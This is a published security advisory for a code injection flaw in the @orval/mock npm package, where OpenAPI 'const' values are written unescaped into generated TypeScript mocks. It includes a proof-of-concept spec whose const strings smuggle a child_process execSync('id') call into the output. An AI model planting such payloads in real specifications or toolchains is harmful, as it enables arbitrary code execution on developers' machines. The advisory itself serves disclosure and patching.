GHSA-f456-rf33-4626

Suggest an improvement
Source
https://github.com/advisories/GHSA-f456-rf33-4626
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/01/GHSA-f456-rf33-4626/GHSA-f456-rf33-4626.json
JSON Data
https://api.osv.dev/v1/vulns/GHSA-f456-rf33-4626
Aliases
Published
2026-01-22T18:09:13Z
Modified
2026-02-03T03:09:00.263996Z
Severity
  • 7.7 (High) CVSS_V4 - CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N CVSS Calculator
Summary
Orval Mock Generation Code Injection via const
Details

I am reporting a code injection vulnerability in Orval’s mock generation pipeline affecting @orval/mock in both the 7.x and 8.x series. This issue is related in impact to the previously reported enum x-enumDescriptions (https://github.com/advisories/GHSA-h526-wf6g-67jv), but it affects a different code path in the faker-based mock generator rather than @orval/core.

The vulnerability allows untrusted OpenAPI specifications to inject arbitrary TypeScript/JavaScript into generated mock files via the const keyword on schema properties. These const values are interpolated into the mock scalar generator (getMockScalar in packages/mock/src/faker/getters/scalar.ts) without proper escaping or type-safe serialization, which results in attacker-controlled code being emitted into both interface definitions and faker/MSW handlers. I have confirmed that this occurs on orval@7.19.0 and orval@8.0.2 with mock: true, and that the generated mocks contain executable payloads such as require('child_process').execSync('id') in the output TypeScript.

openapi: 3.1.0
info:
  title: Mock Const Injection PoC
  version: 1.0.0
paths:
  /test:
    get:
      operationId: getTests
      responses:
        '200':
          description: OK
          content:
            application/json:
              schema:
                $ref: '#/components/schemas/Tests'
components:
  schemas:
    Tests:
      type: object
      properties:
        EvilString:
          type: string
          const: "'); require('child_process').execSync('id'); //"
        EvilNumber:
          type: number
          const: "0); require('child_process').execSync('id'); //"
        SafeEnum:
          type: string
          enum: ["test"]

Database specific
{
    "nvd_published_at": "2026-01-23T00:15:52Z",
    "cwe_ids": [
        "CWE-77"
    ],
    "github_reviewed_at": "2026-01-22T18:09:13Z",
    "severity": "HIGH",
    "github_reviewed": true
}
References

Affected packages

npm / @orval/mock

Package

Affected ranges

Type
SEMVER
Events
Introduced
0Unknown introduced version / All previous versions are affected
Fixed
7.20.0

Database specific

source
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/01/GHSA-f456-rf33-4626/GHSA-f456-rf33-4626.json"

npm / @orval/mock

Package

Affected ranges

Type
SEMVER
Events
Introduced
8.0.0-rc.0
Fixed
8.0.3

Database specific

source
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/01/GHSA-f456-rf33-4626/GHSA-f456-rf33-4626.json"